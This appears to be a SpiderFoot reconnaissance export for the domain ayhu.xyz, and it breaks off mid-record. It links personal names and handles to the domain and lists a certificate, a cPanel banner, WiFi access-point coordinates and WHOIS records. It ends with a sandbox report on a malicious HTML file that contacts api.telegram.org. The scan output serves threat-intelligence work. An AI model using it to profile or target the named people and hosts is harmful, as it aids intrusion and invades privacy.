| 2023-05-12 02:44:03 | Domain Name | No | SpiderFoot UI | 25 | 0 | 0 | 0 | None | ayhu.xyz | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 02:54:04 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.109.153 |
| 2023-05-12 02:44:21 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:97:99:5c:60:ac:40:68:f8:b2:de:0a:67:7a:da:b7:d1:16
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:02:53 2023 GMT
Not After : May 25 03:02:52 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:bc:d0:71:75:f9:c1:51:79:49:f8:25:6c:e2:
4b:7a:05:e1:2b:6c:79:44:98:ff:b2:cc:bc:d7:da:
27:25:29:37:c7:ba:80:cb:e1:7c:b8:4d:37:a2:bc:
93:44:eb:bc:62:ff:47:cb:21:ea:3d:05:4c:04:57:
82:93:5b:a9:25:29:fb:98:33:b0:04:74:aa:bc:9a:
64:5e:c7:e2:6c:e5:ec:2a:e7:40:6b:e1:75:93:39:
b3:cf:b8:e9:11:29:e6:d1:9e:08:56:54:16:9f:c1:
1d:1f:f5:f6:ca:48:3a:94:53:03:1d:bf:52:af:6e:
27:9d:80:8d:f0:57:28:d4:f0:01:34:f4:39:59:4a:
df:9f:00:47:87:9a:39:38:c1:8f:84:8a:02:0b:b2:
6e:5c:36:a2:f6:35:e6:d2:23:6b:29:b1:15:aa:86:
a3:5b:eb:30:cc:af:b8:df:d5:0e:8f:8e:29:7e:0d:
21:28:d0:d2:4c:71:5b:19:01:9b:dc:b9:90:88:7d:
fc:5d:3e:72:44:e6:46:11:dd:e6:fd:a5:42:a3:07:
24:e7:29:d9:29:1c:f3:72:77:8b:cb:0b:df:45:34:
0b:81:a8:00:de:f0:13:74:1b:bf:2f:61:ad:65:73:
29:3e:05:b5:c3:90:28:8c:96:ef:cb:b3:06:ba:9b:
6b:f7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:85:82:A3:5E:ED:4D:54:E9:0D:BD:02:AC:67:B2:FA:F3:E1:58:3F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 24 04:02:53.639 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:28:F1:70:B2:E6:F5:A1:9C:C3:2A:B9:98:
B7:CA:DE:46:06:8A:0D:FD:5D:51:62:6A:9E:AF:A7:18:
F8:56:D1:B0:02:20:21:A4:D3:7B:9B:94:A5:33:57:25:
EA:F9:E9:6B:7D:DB:3E:9B:70:AC:99:47:BB:60:A1:D8:
D4:9F:E0:9F:F4:44
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Feb 24 04:02:53.699 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:3D:E9:FF:70:A3:4B:24:45:DE:32:CD:C1:
EB:D6:68:50:E8:90:39:17:70:65:2F:C3:8E:27:EF:8F:
0A:2C:12:42:02:20:63:BD:B7:88:53:11:AE:74:C0:8C:
3E:DD:9A:2F:D6:E5:34:A4:8C:A2:AB:43:8C:64:7E:9B:
D2:8E:90:08:CE:60
Signature Algorithm: sha256WithRSAEncryption
7e:31:5b:b5:c6:0c:16:27:0b:f5:1a:b3:80:a7:ef:5e:5f:1b:
87:38:b7:8a:be:5c:4b:2a:3f:28:2b:4f:87:5f:c2:b4:d3:b7:
be:f8:28:f5:15:c7:b3:3f:3d:40:b4:03:a4:95:06:01:1a:58:
1f:75:36:4b:ec:65:5a:e0:fd:b0:bf:41:e3:ff:57:4e:dd:05:
47:2c:e5:74:c8:5a:58:19:d6:53:61:f6:8d:0e:19:29:5d:dd:
b2:13:e8:c5:4c:7e:68:dc:f2:b4:05:5a:13:8e:d2:2e:4e:5e:
81:10:a5:86:8f:30:30:f7:61:4a:6f:5c:17:0d:a4:ef:13:02:
05:48:b0:18:ac:9c:df:24:70:12:e3:44:ac:31:54:f5:b6:92:
f4:ec:b6:e7:16:93:23:c7:b8:7e:51:5c:f7:05:33:1c:0e:7a:
b3:3d:ed:21:03:d2:bc:a5:bf:10:81:1f:4c:79:d4:3a:73:b9:
93:9f:57:8b:98:ea:3e:74:39:70:99:3d:3a:c0:f2:4d:e1:55:
ed:dc:49:4e:a6:39:a5:82:ea:2d:6e:e9:17:c6:72:75:ec:10:
72:d0:c9:3e:b9:30:69:bc:2f:70:06:3c:ba:31:b6:c1:0c:45:
e6:92:88:78:56:3a:d4:0c:d2:32:b8:49:37:f3:c4:6d:15:69:
54:99:0a:d9
|
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 401 Unauthorized
Date: <REDACTED>
Server: cPanel
Persistent-Auth: false
Host: 87.248.157.102:2077
Cache-Control: no-cache, no-store, must-revalidate, private
Connection: close
Vary: Accept-Encoding
WWW-Authenticate: Basic realm="Restricted Area"
Content-Encoding: gzip
Content-Length: 52
Content-Type: text/html; charset="utf-8"
Expires: Fri, 01 Jan 1990 00:00:00 GMT
| 87.248.157.102 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | denis (Net ID: 00:01:46:02:C4:4C) | 37.780462,-122.390564 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | <no ssid> (Net ID: 00:02:2D:8E:E3:CD) | 50.1188, 8.6843 |
| 2023-05-12 03:09:25 | Co-Hosted Site - Domain Whois | No | Whois | 2 | 0 | 4 | 0 | None | Domain Name: DONTKILLMYAPP.COM
Registry Domain ID: 2344645406_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ascio.com
Registrar URL: http://www.ascio.com
Updated Date: 2022-11-24T07:34:59Z
Creation Date: 2018-12-19T04:28:10Z
Registry Expiry Date: 2023-12-19T04:28:10Z
Registrar: Ascio Technologies, Inc. Danmark - Filial af Ascio technologies, Inc. USA
Registrar IANA ID: 106
Registrar Abuse Contact Email: abuse@ascio.com
Registrar Abuse Contact Phone: +1.4165350123
Domain Status: ok https://icann.org/epp#ok
Name Server: NS.WEDOS.COM
Name Server: NS.WEDOS.CZ
Name Server: NS.WEDOS.EU
Name Server: NS.WEDOS.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:05Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: dontkillmyapp.com
Registry Domain ID: 2344645406_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ascio.com
Registrar URL: http://www.ascio.com
Updated Date: 2022-11-24T07:35:59Z
Creation Date: 2018-12-19T00:00:00Z
Registrar Registration Expiration Date: 2023-12-19T04:28:10Z
Registrar: Ascio Technologies, Inc
Registrar IANA ID: 106
Registrar Abuse Contact Email: abuse@ascio.com
Registrar Abuse Contact Phone: +44 (20) 81583881
Domain Status: OK https://icann.org/epp#ok
Registry Registrant ID: Not Disclosed
Registrant Name: Not Disclosed
Registrant Organization: Not Disclosed
Registrant Street: Not Disclosed
Registrant City: Not Disclosed
Registrant State/Province:
Registrant Postal Code: Not Disclosed
Registrant Country: CZ
Registrant Phone: Not Disclosed
Registrant Phone Ext: Not Disclosed
Registrant Fax: Not Disclosed
Registrant Fax Ext: Not Disclosed
Registrant Email: https://whoiscontact.ascio.com?domainname=dontkillmyapp.com
Registry Admin ID: Not Disclosed
Admin Name: Not Disclosed
Admin Organization: Not Disclosed
Admin Street: Not Disclosed
Admin City: Not Disclosed
Admin State/Province: Not Disclosed
Admin Postal Code: Not Disclosed
Admin Country: Not Disclosed
Admin Phone: Not Disclosed
Admin Phone Ext: Not Disclosed
Admin Fax: Not Disclosed
Admin Fax Ext: Not Disclosed
Admin Email: Not Disclosed
Registry Tech ID: Not Disclosed
Tech Name: Not Disclosed
Tech Organization: Not Disclosed
Tech Street: Not Disclosed
Tech City: Not Disclosed
Tech State/Province: Not Disclosed
Tech Postal Code: Not Disclosed
Tech Country: Not Disclosed
Tech Phone: Not Disclosed
Tech Phone Ext: Not Disclosed
Tech Fax: Not Disclosed
Tech Fax Ext: Not Disclosed
Tech Email: Not Disclosed
Name Server: ns.wedos.net
Name Server: ns.wedos.cz
Name Server: ns.wedos.eu
Name Server: ns.wedos.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: https://icann.org/wicf
>>> Last update of WHOIS database: 2023-05-12T03:09:25Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
The data in Ascio Technologies' WHOIS database is provided
by Ascio Technologies for information purposes only. By submitting
a WHOIS query, you agree that you will use this data only for lawful
purpose. In addition, you agree not to:
(a) use the data to allow, enable, or otherwise support any marketing
activities, regardless of the medium used. Such media include but are
not limited to e-mail, telephone, facsimile, postal mail, SMS, and
wireless alerts; or
(b) use the data to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registry Operator or
ICANN-Accredited registrar, except as reasonably necessary to register
domain names or modify existing registrations.
(c) sell or redistribute the data except insofar as it has been
incorporated into a value-added product or service that does not permit
the extraction of a substantial portion of the bulk data from the value-added
product or service for use by other parties.
Ascio Technologies reserves the right to modify these terms at any time.
Ascio Technologies cannot guarantee the accuracy of the data provided.
By accessing and using Ascio Technologies WHOIS service, you agree to these terms.
| dontkillmyapp.com |
| 2023-05-12 03:24:51 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Turkey | Domain Name: KEYUBU.COM
Registry Domain ID: 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registry Expiry Date: 2023-07-31T21:39:32Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.COM
Registry Domain ID : 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registrar Registration Expiration Date: 2023-07-31T21:39:32Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.COM
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:12:03Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | ebrahemsamir.github.io | 185.199.109.153 |
| 2023-05-12 02:54:23 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Content_Length": ["0"], "X_Nf_Request_Id": ["01H061ZY9N5FV8EXSVB32WY78R"], "Server": ["Netlify"]} | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.162): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:47:32 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 16, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'WAV-797251.html', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.59.100:443"\n "185.199.111.153:443"\n "13.227.74.44:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8096:304:WilStaging_02"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8096:120:WilError_01"\n "Local\\SM0:8096:120:WilError_01"\n "Local\\SM0:8096:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5004:304:WilStaging_02"\n "Local\\SM0:5004:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3416:304:WilStaging_02"\n "Local\\SM0:3416:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "product_page.js" - Location: [%TEMP%\\8096_1032656472\\product_page.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_tracking_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\8096_1032656472\\auto_open_controller.js]- [targetUID: 00000000-00008096]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\8096_1032656472\\shopping_iframe_driver.js]- [targetUID: 00000000-00008096]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\8096_1032656472\\shoppingfre.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_checkout_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\8096_1534272233\\adblock_snippet.js]- [targetUID: 00000000-00008096]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': 
u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00008096]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00008096]\n "a369bab2-3926-4626-a576-669ff0c25556.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\a369bab2-3926-4626-a576-669ff0c25556.tmp]- [targetUID: 00000000-00008096]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.json]- [targetUID: 00000000-00008096]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00008096]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\8096_1032656472\\product_page.js]- [targetUID: 00000000-00008096]\n "eaa46630-4898-435c-8b79-12a101475848.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\eaa46630-4898-435c-8b79-12a101475848.tmp]- [targetUID: 00000000-00008096]\n "widevinecdm.dll.sig" has type "data"- Location: [%TEMP%\\8096_313714830\\_platform_specific\\win_x64\\widevinecdm.dll.sig]- [targetUID: 00000000-00008096]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00008096]\n "cf602cb1-b95f-433b-8ffc-9eebfa799f0b.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\cf602cb1-b95f-433b-8ffc-9eebfa799f0b.tmp]- [targetUID: 00000000-00003416]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00008096]\n "7de6d455-5aa2-4101-812b-70e599317de8.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\7de6d455-5aa2-4101-812b-70e599317de8.tmp]- [targetUID: 00000000-00003416]\n "4feeb93c-9f79-45f0-9ac6-0adffcb5a10a.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4feeb93c-9f79-45f0-9ac6-0adffcb5a10a.tmp]- [targetUID: 00000000-00008096]\n "deny_domains.list" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\deny_domains.list]- [targetUID: 00000000-00008096]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00008096]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00008096]\n "1be98bdb-eeab-4983-9a3f-102d5eb80cfa.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\1be98bdb-eeab-4983-9a3f-102d5eb80cfa.tmp]- [targetUID: 00000000-00008096]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- [targetUID: 00000000-00008096]\n 
"6419c6fb-280c-4dec-97ac-cbb742fa50bc.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6419c6fb-280c-4dec-97ac-cbb742fa50bc.tmp]- [targetUID: 00000000-00008096]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00008096]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "jLP\',\'KDqei\',\'vXqYi\',\'GOqYh\',\'gISTU\',\'n()\\x20\',\'roJBb\',\'FXzcw\',\'__pro\',\'warn\',\'PukFk\',\'EAlzP\',\'YvMmB\',\'iiLHY\',\'tQrEe\',\'mGJfV\',\'strin\',\'pbBLV\',\'KlDNI\',\'nbsJn\',\'kVpKR\',\'BiHjg\',\'FNmxz\',\'sWuxZ\',\'ZOmpK\',\'om%2f\',\'FpgMT\',\'sjuIm\',\'style\',\'round\',\'EuVvW\',\'Qydgv\',\'s"\n Heuristic match: "api.telegram.org"\n Heuristic match: "l@allledglobal.com"\n Heuristic match: "german.l@alliedglobal.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, 
